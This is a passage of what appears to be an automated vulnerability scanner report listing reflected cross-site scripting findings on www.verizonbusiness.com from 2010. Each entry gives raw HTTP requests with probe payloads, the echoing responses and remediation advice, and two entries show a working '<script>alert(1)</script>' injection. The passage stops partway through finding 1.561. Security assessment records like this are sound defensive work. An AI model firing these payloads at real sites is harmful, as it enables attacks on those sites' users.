This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/itsolutions/caas471a3"%3baa7257f4871/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response (redirected)

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:08 GMT
Content-Type: text/html
Content-Length: 43387
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/cloud-it/caas471a3";aa7257f4871/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.549. http://www.verizonbusiness.com/pt/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /pt/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 765d2"%3be7f97da6fce was submitted in the REST URL parameter 1. This input was echoed as 765d2";e7f97da6fce in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pt765d2"%3be7f97da6fce/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:17 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/pt765d2";e7f97da6fce/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.550. http://www.verizonbusiness.com/pt/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /pt/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25def'%3b5568cd217f2 was submitted in the REST URL parameter 1. This input was echoed as 25def';5568cd217f2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pt25def'%3b5568cd217f2/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:45 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/pt25def';5568cd217f2/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.551. http://www.verizonbusiness.com/resources/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13e62'%3b7a1a1606011 was submitted in the REST URL parameter 1. This input was echoed as 13e62';7a1a1606011 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources13e62'%3b7a1a1606011/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40618
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources13e62';7a1a1606011/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.552. http://www.verizonbusiness.com/resources/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 437b5"%3b3c1819f3a01 was submitted in the REST URL parameter 1. This input was echoed as 437b5";3c1819f3a01 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources437b5"%3b3c1819f3a01/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:04:13 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40618
Date: Wed, 17 Nov 2010 00:04:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources437b5";3c1819f3a01/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.553. http://www.verizonbusiness.com/resources/1002a1a2-111-Healthcare.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a2-111-Healthcare.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac72d'%3b34f9ca1396e was submitted in the REST URL parameter 1. This input was echoed as ac72d';34f9ca1396e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesac72d'%3b34f9ca1396e/1002a1a2-111-Healthcare.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:41 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40656
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resourcesac72d';34f9ca1396e/1002a1a2-111-Healthcare.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.554. http://www.verizonbusiness.com/resources/1002a1a2-111-Healthcare.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a2-111-Healthcare.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e921e"%3b45eba8308f0 was submitted in the REST URL parameter 1. This input was echoed as e921e";45eba8308f0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcese921e"%3b45eba8308f0/1002a1a2-111-Healthcare.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:25 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40654
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcese921e";45eba8308f0/1002a1a2-111-Healthcare.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEME
...[SNIP]...

1.555. http://www.verizonbusiness.com/resources/1002a1a2-111-Healthcare.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a2-111-Healthcare.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95b56'%3b992e6143e2e was submitted in the REST URL parameter 2. This input was echoed as 95b56';992e6143e2e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/95b56'%3b992e6143e2e HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:21:55 GMT
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:21:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:21:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/95b56';992e6143e2e'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.556. http://www.verizonbusiness.com/resources/1002a1a2-111-Healthcare.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a2-111-Healthcare.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82e1e</script><script>alert(1)</script>f041dbfc7ba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a1a2-111-Healthcare.xml82e1e</script><script>alert(1)</script>f041dbfc7ba HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "4eeb2625c4af4591108893450e729612"
Last-Modified: Wed, 17 Nov 2010 00:21:48 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:21:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3da5ef3f9f-9afb-4bac-820d-476452b591f8|VTID%3df2facbeb-66be-411f-89e9-1a3cb1c78d59|SX%3d1289954508|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:25:32 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:21:48 GMT
Content-Length: 43585

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a1a2-111-Healthcare.xml82e1e</script><script>alert(1)</script>f041dbfc7ba</url>
...[SNIP]...

1.557. http://www.verizonbusiness.com/resources/1002a1a3-111-Financial.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a3-111-Financial.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ab36"%3b068213b8fe2 was submitted in the REST URL parameter 1. This input was echoed as 5ab36";068213b8fe2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources5ab36"%3b068213b8fe2/1002a1a3-111-Financial.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:03 GMT
Content-Type: text/html
Content-Length: 40652
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources5ab36";068213b8fe2/1002a1a3-111-Financial.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMEN
...[SNIP]...

1.558. http://www.verizonbusiness.com/resources/1002a1a3-111-Financial.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a3-111-Financial.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e088'%3b2ca1ff37447 was submitted in the REST URL parameter 1. This input was echoed as 1e088';2ca1ff37447 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources1e088'%3b2ca1ff37447/1002a1a3-111-Financial.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:19:24 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40652
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources1e088';2ca1ff37447/1002a1a3-111-Financial.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.559. http://www.verizonbusiness.com/resources/1002a1a3-111-Financial.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a3-111-Financial.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89ba5'%3b4290e890be9 was submitted in the REST URL parameter 2. This input was echoed as 89ba5';4290e890be9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/89ba5'%3b4290e890be9 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:21:58 GMT
Content-Type: text/html
Content-Length: 40212
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:21:58 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:21:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/89ba5';4290e890be9'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.560. http://www.verizonbusiness.com/resources/1002a1a3-111-Financial.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a3-111-Financial.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c021</script><script>alert(1)</script>2f887a43aad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a1a3-111-Financial.xml2c021</script><script>alert(1)</script>2f887a43aad HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "63fcca76b10c3920734d22c136ea71e0"
Last-Modified: Wed, 17 Nov 2010 00:21:55 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:21:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3dc1619485-baef-4611-8a4e-f05e8624cddd|VTID%3d5070fc18-a93e-4d4c-8aeb-7150437e3159|SX%3d1289954515|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:25:39 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:21:55 GMT
Content-Length: 38257

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a1a3-111-Financial.xml2c021</script><script>alert(1)</script>2f887a43aad</url>
...[SNIP]...

1.561. http://www.verizonbusiness.com/resources/1002a1a4-111-Education.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a4-111-Education.xml

Issue detail

